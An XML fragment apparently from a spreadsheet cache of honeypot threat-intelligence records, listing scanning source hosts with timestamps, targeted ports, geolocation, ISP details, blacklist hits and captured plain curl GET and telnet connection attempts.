    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:122:28d"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3590"/>
    <x v="3590"/>
    <s v="125-228-37-39.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:41:01"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T07:41:01"/>
    <n v="379"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;13719&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:2527"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3591"/>
    <x v="3591"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:39:42"/>
    <d v="2025-04-02T07:39:42"/>
    <d v="2025-04-02T07:39:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63c:2307"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3592"/>
    <x v="3592"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:26:57"/>
    <d v="2025-04-01T19:22:06"/>
    <d v="2025-04-02T07:26:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c9:b246"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3593"/>
    <x v="3593"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:20:52"/>
    <d v="2025-04-02T05:40:38"/>
    <d v="2025-04-02T07:20:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>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2001-12-27"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:72f2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3594"/>
    <x v="3594"/>
    <s v="114-33-61-109.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:20:00"/>
    <d v="2023-07-27T11:32:58"/>
    <d v="2025-04-02T07:20:00"/>
    <n v="566"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;52793&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:3d6d"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3595"/>
    <x v="3595"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:16:25"/>
    <d v="2025-04-01T12:33:51"/>
    <d v="2025-04-02T07:16:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:22c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3596"/>
    <x v="3596"/>
    <s v="NA&amp;&amp;220-132-171-103.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T07:11:49"/>
    <d v="2023-08-06T00:57:00"/>
    <d v="2025-04-02T07:11:49"/>
    <n v="890"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;33501&amp;&amp;80&amp;&amp;9100&amp;&amp;NA&amp;&amp;61549"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc84:ab67"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3597"/>
    <x v="3597"/>
    <s v="59-126-32-90.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:11:48"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T07:11:48"/>
    <n v="561"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;44822&amp;&amp;23&amp;&amp;80"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7e:205a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3598"/>
    <x v="3598"/>
    <s v="125-228-29-65.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T06:58:41"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T06:58:41"/>
    <n v="248"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_DNS_H5&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;46996&amp;&amp;80&amp;&amp;4892&amp;&amp;40514&amp;&amp;45629&amp;&amp;56765&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:1d41"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3599"/>
    <x v="3599"/>
    <s v="122-117-18-160.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T06:44:40"/>
    <d v="2023-12-21T11:48:10"/>
    <d v="2025-04-02T06:44:40"/>
    <n v="3405"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_NTP_H36&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;22&amp;&amp;9100&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;123&amp;&amp;5900&amp;&amp;54336&amp;&amp;23&amp;&amp;15957"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:12a0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3600"/>
    <x v="3600"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T06:42:39"/>
    <d v="2025-03-22T16:38:34"/>
    <d v="2025-04-02T06:42:39"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="13"/>
    <s v="Pazardzhik"/>
    <s v="Pazardzhik"/>
    <s v="Pazardzhik"/>
    <s v="728378"/>
    <s v="4400"/>
    <s v="42.2"/>
    <s v="24.3333"/>
    <s v="43205"/>
    <s v="Vivacom Bulgaria EAD"/>
    <s v="Bulsatcom AD"/>
    <s v="business"/>
    <s v="Bulsatcom AD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eed:4673"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3601"/>
    <x v="3601"/>
    <s v="125-229-241-172.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T06:42:02"/>
    <d v="2023-09-02T12:38:00"/>
    <d v="2025-04-02T06:42:02"/>
    <n v="1169"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;5900&amp;&amp;445&amp;&amp;9100&amp;&amp;389&amp;&amp;22&amp;&amp;1080&amp;&amp;40964&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
